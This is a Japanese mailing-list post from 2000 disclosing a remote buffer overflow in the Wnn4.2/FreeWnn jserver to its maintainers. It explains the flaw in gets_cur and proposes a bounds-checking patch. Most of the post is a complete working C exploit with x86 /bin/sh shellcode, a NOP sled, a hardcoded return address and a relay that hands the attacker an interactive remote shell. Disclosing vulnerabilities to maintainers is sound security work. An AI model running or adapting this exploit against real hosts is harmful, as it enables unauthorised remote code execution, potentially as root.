[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[freewnn:00355] security problem of jserver
- To: freewnn@tomo.tomo.gr.jp
- Subject: [freewnn:00355] security problem of jserver
- From: UNYUN <shadowpenguin@XXXX>
- Date: Wed, 08 Mar 2000 08:59:46 +0900
- Reply-To: freewnn@tomo.gr.jp
はじめまして。
Shadow Penguin Security 代表 UNYUN と申します。
私たちは、OSやアプリケーションのセキュリティ検査、およびセキュリティ関連
技術に関する情報交換などを行っている団体です。
Wnn4.2のjserverを検査した所、Buffer Overflowによるセキュリティホールが存
在することを確認しました。jserverの動作しているホストに対しリモートから
jserverの動作権限で任意のコードを実行することができます。
http://www.freewnn.orgにて公開されているFreeWnn-1.10.tar.gz、および
FreeWnn-1.1.1-a016.tar.gzを検査させて頂きましたが、同様の問題があるように
思われます。
Turbolinux3.0付属のWnn4.2での調査結果をご報告致します。
----------
1. 概要
Wnn4.2/jserverに対し、異常な長さのコマンドを送ることによりバッファオーバー
フローが発生します。バッファオーバフローはJS_OPEN、JS_MKDIR、JS_FILE_INFO
など、文字列処理を伴うほとんどのコマンドで発生します。このバッファオーバー
フローにより、スタック上のローカルバッファを上書きすることができ、任意のRET
アドレスを設定することができるため、文字列中に記述された任意の機械語コード
をリモートから実行させることができます。
2. 危険性
外部から不正なshellコマンドを実行されるなどの危険性があり、jserverが
root権限で動作している場合は、不正なアカウント追加や.rhostsファイルの書き
換え等による外部からの不正侵入、およびroot権限の不正利用等の危険性があり
ます。
3. 解決法
このバッファオーバーフローに関するセキュリティ問題は、適切なバウンドチェッ
クを行うことにより回避することが可能です。コードを再確認し、バウンドチェッ
ク漏れのある部分を修正します。クライアントから送信された文字列をgets_cur
にてバウンドチェック無しでローカルバッファに保存している個所が多くありま
すが、こういったローカルバッファへのコピーの際は全て文字列長をチェックし
ます。
(例)
- do_env.c
void
js_open()
{register int version;
/*
register int i;
*/
char tmp_buf[256];
version = get4_cur();
gets_cur(tmp_buf);
~~~~~~~~~~~~~~~~~~~
↓
gets_cur(tmp_buf,256); に変更
- de.c
void
gets_cur(cp)
register char *cp;
{
while((*cp++ = getc_cur()) != '\0');
}
↓
void
gets_cur(cp,len)
register char *cp;
int len;
{
int i;
for (i=0;i<len;i++)
if ((*(cp+i)=getc_cur())=='\0') break;
}
に変更
4. 参考コード
このexploitコードは、Wnn4.2/jserverの動作しているホストに対して任意の
shellコマンドを外部から実行させるものです
/*=============================================================================
Wnn4.2 / jserver remote buffer overflow exploit for Linux
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <unistd.h>
#include <strings.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#define TARGET_PORT 22273
#define COMMAND 0x01
#define VERSION 0x4000
#define MAXBUF 800
#define STR1_SIZE 10
#define NOP 0x90
#define RET 0xbffffcb4
#define ADJUST 3
char *shellcode =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab"
"\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80"
"\xe8\xd9\xff\xff\xff/bin/sh";
void putint(sockfd,c)
int sockfd,c;
{
unsigned char tmp[4];
tmp[0]=(c >> (8 * 3))&0xff;
tmp[1]=(c >> (8 * 2))&0xff;
tmp[2]=(c >> (8 * 1))&0xff;
tmp[3]=c&0xff;
write(sockfd,tmp,4);
}
void term (int p, int c)
{
char buf[1032];
fd_set rfds;
int i;
while(1){
FD_ZERO (&rfds);
FD_SET (p, &rfds);
FD_SET (c, &rfds);
if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1) return;
if (FD_ISSET (c, &rfds)){
if ((i = read (c, buf, sizeof (buf))) < 1) exit (0);
else write (p, buf, i);
}
if (FD_ISSET (p, &rfds)){
if ((i = read (p, buf, sizeof (buf))) < 1) exit (0);
else write (c, buf, i);
}
}
}
main(int argc,char *argv[])
{
int sockfd,i;
struct in_addr addr;
struct sockaddr_in target;
struct hostent *hs;
char buf[MAXBUF];
if (argc<2){
printf("usage : %s TargetHost\n",argv[0]);
exit(1);
}
sockfd=socket(AF_INET, SOCK_STREAM, 0);
target.sin_family=AF_INET;
target.sin_port=htons(TARGET_PORT);
if ((target.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
target.sin_family = hs->h_addrtype;
memcpy((caddr_t)&target.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if (connect(sockfd, (struct sockaddr*)&target, sizeof(target))!=0){
printf("Can not connect to %s:%d\n",argv[1],TARGET_PORT);
exit(1);
}
putint(sockfd,COMMAND);
putint(sockfd,VERSION);
memset(buf,NOP,MAXBUF);
printf("Jumping Address=%x\n",RET);
for (i=100+ADJUST;i<400+ADJUST;i+=4){
buf[i+3]=(RET>>24)&0xff;
buf[i+2]=(RET>>16)&0xff;
buf[i+1]=(RET>>8)&0xff;
buf[i+0]=RET&0xff;
}
buf[STR1_SIZE]=0;
buf[MAXBUF-1]=0;
memcpy(buf+600+ADJUST,shellcode,strlen(shellcode));
write(sockfd,buf,MAXBUF);
printf("Connected to %d\n",TARGET_PORT);
term(sockfd,0);
}
以上、ご報告させて頂きます。
-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
shadowpenguin@backsection.net (webmaster)
% eEye Digital Security Team [ http://www.eEye.com ]
unyun@eEye.com